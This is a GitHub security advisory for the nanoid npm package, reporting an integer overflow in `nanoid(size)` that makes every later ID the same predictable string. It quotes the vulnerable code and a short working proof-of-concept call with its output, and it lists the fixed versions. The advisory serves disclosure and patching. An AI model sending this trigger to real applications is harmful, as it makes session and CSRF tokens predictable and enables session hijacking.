{"id":"GHSA-xwg4-73v4-xw9w","summary":"nanoid: Integer Overflow or Wraparound","details":"### Summary\n\nAn integer overflow in `nanoid(size)` permanently corrupts the process-wide CSPRNG pool, causing all subsequent ID generation to return the deterministic string `\"uuuuuuuuuuuuuuuuuuuuu\"`. Any application that passes user-influenced values to the `size` parameter loses all randomness guarantees for session tokens, CSRF tokens, and unique identifiers until process restart.\n\n### Details\n\n`nanoid()` at [`index.js:101`](https://github.com/ai/nanoid/blob/main/index.js#L101) coerces the `size` parameter with `size |= 0`, which converts it to a signed 32-bit integer. When `size \u003e= 2^31` (e.g., `2147483648`), this wraps to `-2147483648`.\n\nThe negative value is passed to `fillPool()` ([`index.js:15`](https://github.com/ai/nanoid/blob/main/index.js#L15)):\n\n```javascript\nfunction fillPool(bytes) {\n  if (!pool || pool.length \u003c bytes) {       // false: pool exists, -2B \u003c pool.length\n    pool = Buffer.allocUnsafe(bytes * POOL_SIZE_MULTIPLIER)\n    crypto.getRandomValues(pool)\n    poolOffset = 0\n  } else if (poolOffset + bytes \u003e pool.length) {  // false: poolOffset + (-2B) \u003c pool.length\n    crypto.getRandomValues(pool)\n    poolOffset = 0\n  }\n  poolOffset += bytes  // poolOffset += -2147483648 → deeply negative\n}\n```\n\nNeither branch triggers, so the pool is never refreshed. `poolOffset` becomes ~-2.1 billion.\n\nSubsequent `nanoid()` calls execute:\n```javascript\nfor (let i = poolOffset - size; i \u003c poolOffset; i++) {\n  id += scopedUrlAlphabet[pool[i] & 63]\n}\n```\n\n`pool[negative_index]` returns `undefined`. `undefined & 63` evaluates to `0`. `urlAlphabet[0]` is `'u'`. Every ID becomes `\"uuuuuuuuuuuuuuuuuuuuu\"`.\n\nThe corruption is **persistent** — it affects all subsequent calls in the process until ~100 million calls eventually wrap `poolOffset` back to positive, or the process restarts.\n\n### PoC\n\n```javascript\nimport { nanoid } from 'nanoid'\n\n// Step 1: Normal operation\nconsole.log(nanoid())  // e.g., \"V1StGXR8_Z5jdHi6B-myT\"\n\n// Step 2: Trigger overflow (e.g., from an API parameter)\ntry { nanoid(2147483648) } catch(e) {}\n\n// Step 3: All subsequent IDs are deterministic\nconsole.log(nanoid())  // \"uuuuuuuuuuuuuuuuuuuuu\"\nconsole.log(nanoid())  // \"uuuuuuuuuuuuuuuuuuuuu\"\nconsole.log(nanoid())  // \"uuuuuuuuuuuuuuuuuuuuu\"\n// ... forever, process-wide\n```\n\nRun with: `node --experimental-vm-modules poc.mjs`\n\nAttack scenario: Any API endpoint that accepts a user-controlled length/size parameter (URL shortener slug length, configurable token size, etc.) and passes it to `nanoid(userInput)`.\n\n### Impact\n\n**Complete loss of ID unpredictability and uniqueness, process-wide, from a single request.**\n\n- All session IDs, CSRF tokens, API keys, and database identifiers generated after the attack are identical and predictable\n- An attacker can predict all tokens issued to other users, enabling session hijacking and authentication bypass\n- The corruption is persistent (survives across requests) and affects all consumers of `nanoid` in the same process\n- No special privileges or preconditions required — a single unauthenticated request is sufficient\n- Affects any application that passes external input to the `size` parameter without validation","aliases":["CVE-2026-73086"],"modified":"2026-09-01T19:30:09.037397285Z","published":"2026-09-01T19:23:45Z","database_specific":{"github_reviewed_at":"2026-09-01T19:23:45Z","nvd_published_at":"2026-08-11T17:19:16Z","cwe_ids":["CWE-190"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/ai/nanoid/security/advisories/GHSA-xwg4-73v4-xw9w"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-73086"},{"type":"WEB","url":"https://github.com/ai/nanoid/commit/7087969281cab8ba8ae3babf1894e819068b3bb4"},{"type":"WEB","url":"https://github.com/ai/nanoid/commit/821dfed7b5db7f88e92f56c60eef32c8135077c3"},{"type":"WEB","url":"https://github.com/ai/nanoid/commit/b0036ed60dc9facd7f1191a50dfb3076500202ac"},{"type":"PACKAGE","url":"https://github.com/ai/nanoid"},{"type":"WEB","url":"https://github.com/ai/nanoid/releases/tag/3.3.12"},{"type":"WEB","url":"https://github.com/ai/nanoid/releases/tag/5.1.11"}],"affected":[{"package":{"name":"nanoid","ecosystem":"npm","purl":"pkg:npm/nanoid"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.3.12"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-xwg4-73v4-xw9w/GHSA-xwg4-73v4-xw9w.json"}},{"package":{"name":"nanoid","ecosystem":"npm","purl":"pkg:npm/nanoid"},"ranges":[{"type":"SEMVER","events":[{"introduced":"4.0.0"},{"fixed":"5.1.11"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-xwg4-73v4-xw9w/GHSA-xwg4-73v4-xw9w.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}]}